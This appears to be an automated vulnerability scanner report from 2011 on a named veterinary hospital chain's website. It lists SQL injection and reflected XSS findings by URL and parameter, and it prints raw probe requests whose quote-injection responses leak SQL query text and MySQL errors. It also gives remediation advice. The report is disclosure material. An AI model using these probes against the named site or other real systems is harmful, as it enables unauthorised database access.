XSS, SQL Injection, CWE-79, CWE-89, CAPEC-86, CAPEC-66, www.vcahospitals.com
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Report generated by XSS.CX at Sat Mar 05 06:53:38 CST 2011.
1. SQL injection
1.1. http://www.vcahospitals.com/hanson [REST URL parameter 1]
1.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 1]
1.3. http://www.vcahospitals.com/main/directory.html [REST URL parameter 1]
1.4. http://www.vcahospitals.com/main/img/blockquote-left.png [REST URL parameter 1]
1.5. http://www.vcahospitals.com/main/img/blockquote-right.png [REST URL parameter 1]
1.6. http://www.vcahospitals.com/main/img/sema-landing.jpg [REST URL parameter 1]
1.7. http://www.vcahospitals.com/main/offer [REST URL parameter 1]
1.8. http://www.vcahospitals.com/main/offer [REST URL parameter 1]
1.9. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1]
1.10. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1]
1.11. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1]
1.12. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1]
1.13. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 1]
1.14. http://www.vcahospitals.com/marshfield [REST URL parameter 1]
1.15. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 1]
1.16. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 1]
1.17. http://www.vcahospitals.com/plymouth [REST URL parameter 1]
1.18. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 1]
1.19. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 1]
1.20. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter]
2. Cross-site scripting (reflected)
2.1. http://www.vcahospitals.com/becker/markers.php [REST URL parameter 2]
2.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 2]
2.3. http://www.vcahospitals.com/hanson/appt.html [altphone parameter]
2.4. http://www.vcahospitals.com/hanson/appt.html [ampm1 parameter]
2.5. http://www.vcahospitals.com/hanson/appt.html [ampm2 parameter]
2.6. http://www.vcahospitals.com/hanson/appt.html [ampm3 parameter]
2.7. http://www.vcahospitals.com/hanson/appt.html [name of an arbitrarily supplied request parameter]
2.8. http://www.vcahospitals.com/hanson/offer.html [addr parameter]
2.9. http://www.vcahospitals.com/hanson/offer.html [captcha_code parameter]
2.10. http://www.vcahospitals.com/hanson/offer.html [city parameter]
2.11. http://www.vcahospitals.com/hanson/offer.html [email parameter]
2.12. http://www.vcahospitals.com/hanson/offer.html [fname parameter]
2.13. http://www.vcahospitals.com/hanson/offer.html [formtype parameter]
2.14. http://www.vcahospitals.com/hanson/offer.html [guid parameter]
2.15. http://www.vcahospitals.com/hanson/offer.html [ipaddress parameter]
2.16. http://www.vcahospitals.com/hanson/offer.html [js parameter]
2.17. http://www.vcahospitals.com/hanson/offer.html [lname parameter]
2.18. http://www.vcahospitals.com/main/offer [ parameter]
2.19. http://www.vcahospitals.com/main/offer [&optin parameter]
2.20. http://www.vcahospitals.com/main/offer [&state parameter]
2.21. http://www.vcahospitals.com/main/offer [addr parameter]
2.22. http://www.vcahospitals.com/main/offer [city parameter]
2.23. http://www.vcahospitals.com/main/offer [date parameter]
2.24. http://www.vcahospitals.com/main/offer [email parameter]
2.25. http://www.vcahospitals.com/main/offer [fname parameter]
2.26. http://www.vcahospitals.com/main/offer [formtype parameter]
2.27. http://www.vcahospitals.com/main/offer [gclid parameter]
2.28. http://www.vcahospitals.com/main/offer [guid parameter]
2.29. http://www.vcahospitals.com/main/offer [ipaddress parameter]
2.30. http://www.vcahospitals.com/main/offer [lname parameter]
2.31. http://www.vcahospitals.com/main/offer [name of an arbitrarily supplied request parameter]
2.32. http://www.vcahospitals.com/main/offer [newmex parameter]
2.33. http://www.vcahospitals.com/main/offer [optin parameter]
2.34. http://www.vcahospitals.com/main/offer [other parameter]
2.35. http://www.vcahospitals.com/main/offer [petage parameter]
2.36. http://www.vcahospitals.com/main/offer [petname parameter]
2.37. http://www.vcahospitals.com/main/offer [pettype parameter]
2.38. http://www.vcahospitals.com/main/offer [phone parameter]
2.39. http://www.vcahospitals.com/main/offer [r parameter]
2.40. http://www.vcahospitals.com/main/offer [referer parameter]
2.41. http://www.vcahospitals.com/main/offer [state parameter]
2.42. http://www.vcahospitals.com/main/offer [submit parameter]
2.43. http://www.vcahospitals.com/main/offer [token parameter]
2.44. http://www.vcahospitals.com/main/offer [tollfree parameter]
2.45. http://www.vcahospitals.com/main/offer [uri parameter]
2.46. http://www.vcahospitals.com/main/offer [useragent parameter]
2.47. http://www.vcahospitals.com/main/offer [utm_campaign parameter]
2.48. http://www.vcahospitals.com/main/offer [utm_medium parameter]
2.49. http://www.vcahospitals.com/main/offer [utm_source parameter]
2.50. http://www.vcahospitals.com/main/offer [utm_term parameter]
2.51. http://www.vcahospitals.com/main/offer [variant parameter]
2.52. http://www.vcahospitals.com/main/offer [zip parameter]
2.53. http://www.vcahospitals.com/main/offer/ [ parameter]
2.54. http://www.vcahospitals.com/main/offer/ [&optin parameter]
2.55. http://www.vcahospitals.com/main/offer/ [&state parameter]
2.56. http://www.vcahospitals.com/main/offer/ [addr parameter]
2.57. http://www.vcahospitals.com/main/offer/ [city parameter]
2.58. http://www.vcahospitals.com/main/offer/ [date parameter]
2.59. http://www.vcahospitals.com/main/offer/ [email parameter]
2.60. http://www.vcahospitals.com/main/offer/ [fname parameter]
2.61. http://www.vcahospitals.com/main/offer/ [formtype parameter]
2.62. http://www.vcahospitals.com/main/offer/ [guid parameter]
2.63. http://www.vcahospitals.com/main/offer/ [ipaddress parameter]
2.64. http://www.vcahospitals.com/main/offer/ [lname parameter]
2.65. http://www.vcahospitals.com/main/offer/ [name of an arbitrarily supplied request parameter]
2.66. http://www.vcahospitals.com/main/offer/ [newmex parameter]
2.67. http://www.vcahospitals.com/main/offer/ [optin parameter]
2.68. http://www.vcahospitals.com/main/offer/ [other parameter]
2.69. http://www.vcahospitals.com/main/offer/ [petage parameter]
2.70. http://www.vcahospitals.com/main/offer/ [petname parameter]
2.71. http://www.vcahospitals.com/main/offer/ [pettype parameter]
2.72. http://www.vcahospitals.com/main/offer/ [phone parameter]
2.73. http://www.vcahospitals.com/main/offer/ [referer parameter]
2.74. http://www.vcahospitals.com/main/offer/ [state parameter]
2.75. http://www.vcahospitals.com/main/offer/ [submit parameter]
2.76. http://www.vcahospitals.com/main/offer/ [token parameter]
2.77. http://www.vcahospitals.com/main/offer/ [tollfree parameter]
2.78. http://www.vcahospitals.com/main/offer/ [uri parameter]
2.79. http://www.vcahospitals.com/main/offer/ [useragent parameter]
2.80. http://www.vcahospitals.com/main/offer/ [variant parameter]
2.81. http://www.vcahospitals.com/main/offer/ [zip parameter]
2.82. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3]
2.83. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3]
2.84. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 2]
2.85. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [name of an arbitrarily supplied request parameter]
2.86. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 2]
2.87. http://www.vcahospitals.com/marshfield/appt.html [name of an arbitrarily supplied request parameter]
2.88. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 2]
2.89. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [altphone parameter]
2.90. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm1 parameter]
2.91. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm2 parameter]
2.92. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm3 parameter]
2.93. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [appt_type parameter]
2.94. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [client parameter]
2.95. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date1 parameter]
2.96. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date2 parameter]
2.97. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date3 parameter]
2.98. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [doctor parameter]
2.99. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [email parameter]
2.100. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [fname parameter]
2.101. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [guid parameter]
2.102. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ipaddress parameter]
2.103. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [lname parameter]
2.104. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [name of an arbitrarily supplied request parameter]
2.105. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [optin parameter]
2.106. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [other parameter]
2.107. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petage parameter]
2.108. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petname parameter]
2.109. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [pettype parameter]
2.110. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [phone parameter]
2.111. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [reason parameter]
2.112. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [referer parameter]
2.113. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [source parameter]
2.114. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [submit parameter]
2.115. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time1 parameter]
2.116. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time2 parameter]
2.117. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time3 parameter]
2.118. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [token parameter]
2.119. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [uri parameter]
2.120. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [useragent parameter]
2.121. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 2]
2.122. http://www.vcahospitals.com/plymouth/appt.html [name of an arbitrarily supplied request parameter]
2.123. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 2]
2.124. http://www.vcahospitals.com/hanson/appt.html [Referer HTTP header]
2.125. http://www.vcahospitals.com/hanson/appt.html [User-Agent HTTP header]
2.126. http://www.vcahospitals.com/main/offer [Referer HTTP header]
2.127. http://www.vcahospitals.com/main/offer [User-Agent HTTP header]
2.128. http://www.vcahospitals.com/main/offer/ [Referer HTTP header]
2.129. http://www.vcahospitals.com/main/offer/ [User-Agent HTTP header]
2.130. http://www.vcahospitals.com/main/offer/thank-you.html [Referer HTTP header]
2.131. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [Referer HTTP header]
2.132. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [User-Agent HTTP header]
2.133. http://www.vcahospitals.com/marshfield/appt.html [Referer HTTP header]
2.134. http://www.vcahospitals.com/marshfield/appt.html [User-Agent HTTP header]
2.135. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [Referer HTTP header]
2.136. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [User-Agent HTTP header]
2.137. http://www.vcahospitals.com/plymouth/appt.html [Referer HTTP header]
2.138. http://www.vcahospitals.com/plymouth/appt.html [User-Agent HTTP header]
3. SQL statement in request parameter
3.1. http://www.vcahospitals.com/main/offer
3.2. http://www.vcahospitals.com/main/offer/
3.3. http://www.vcahospitals.com/main/offer/thank-you.html
3.4. http://www.vcahospitals.com/tools/markers_sema.php
4. Session token in URL
4.1. http://www.vcahospitals.com/hanson/appt.html
4.2. http://www.vcahospitals.com/hanson/offer.html
4.3. http://www.vcahospitals.com/main/offer
4.4. http://www.vcahospitals.com/main/offer/
4.5. http://www.vcahospitals.com/main/offer/thank-you.html
4.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html
5. Cookie without HttpOnly flag set
5.1. http://www.vcahospitals.com/hanson/appt.html
5.2. http://www.vcahospitals.com/hanson/offer.html
5.3. http://www.vcahospitals.com/main/offer
5.4. http://www.vcahospitals.com/main/offer/
5.5. http://www.vcahospitals.com/main/offer/thank-you.html
5.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html
6. Referer-dependent response
6.1. http://www.vcahospitals.com/hanson/appt.html
6.2. http://www.vcahospitals.com/main/offer
6.3. http://www.vcahospitals.com/main/offer/
6.4. http://www.vcahospitals.com/main/offer/thank-you.html
6.5. http://www.vcahospitals.com/marshfield/appt.html
7. Cross-domain Referer leakage
7.1. http://www.vcahospitals.com/hanson/appt.html
7.2. http://www.vcahospitals.com/hanson/offer.html
7.3. http://www.vcahospitals.com/main/directory.html
7.4. http://www.vcahospitals.com/main/offer
7.5. http://www.vcahospitals.com/main/offer/thank-you.html
7.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html
8. Cross-domain script include
8.1. http://www.vcahospitals.com/favicon.ico
8.2. http://www.vcahospitals.com/hanson
8.3. http://www.vcahospitals.com/hanson/appt.html
8.4. http://www.vcahospitals.com/hanson/offer.html
8.5. http://www.vcahospitals.com/main/directory.html
8.6. http://www.vcahospitals.com/main/offer
8.7. http://www.vcahospitals.com/main/offer/thank-you.html
8.8. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html
8.9. http://www.vcahospitals.com/marshfield
8.10. http://www.vcahospitals.com/marshfield/appt.html
8.11. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html
8.12. http://www.vcahospitals.com/plymouth
8.13. http://www.vcahospitals.com/plymouth/appt.html
8.14. http://www.vcahospitals.com/plymouth/more/boarding.html
9. TRACE method is enabled
10. Email addresses disclosed
11. HTML does not specify charset
11.1. http://www.vcahospitals.com/tools/SMSComm.php
11.2. http://www.vcahospitals.com/tools/markers_sema.php
12. Content type incorrectly stated
12.1. http://www.vcahospitals.com/tools/SMSComm.php
12.2. http://www.vcahospitals.com/tools/markers_sema.php
1. SQL injection
There are 20 instances of this issue:
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure.

You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.

Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://www.vcahospitals.com/hanson [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /hanson' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.13.10.1299326665
Response 1
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2242
Content-Type: text/html

select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='hanson'' limit 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''hanson'' limit 1' at line 31
Request 2
GET /hanson'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.13.10.1299326665
Response 2
HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:08 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 9793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte...[SNIP]...
1.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /hanson/appt.html
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /hanson'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665
Response 1
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2242
Content-Type: text/html

select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='hanson'' limit 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''hanson'' limit 1' at line 31
Request 2
GET /hanson''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665
Response 2
HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte...[SNIP]...
1.3. http://www.vcahospitals.com/main/directory.html [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/directory.html
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /main'/directory.html?utm_content=link.corp.ffe.locator. HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.5.10.1299326665
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:45:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='main'' limit 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main'' limit 1' at line 31
1.4. http://www.vcahospitals.com/main/img/blockquote-left.png [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/img/blockquote-left.png
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /main'/img/blockquote-left.png HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:11:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select ims_HospitalAddress.*, ims_HospitalCustomService.*, ims_HospitalFax.*, ims_HospitalOtherContact.*, ims_HospitalCustomService.*, ...[SNIP]... left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id where ims_Hospital.i_short_name='main'' limit 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main'' limit 1' at line 31
1.5. http://www.vcahospitals.com/main/img/blockquote-right.png [REST URL parameter 1]
Summary
Severity: High
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/img/blockquote-right.png
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /main'/img/blockquote-right.png HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:11:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

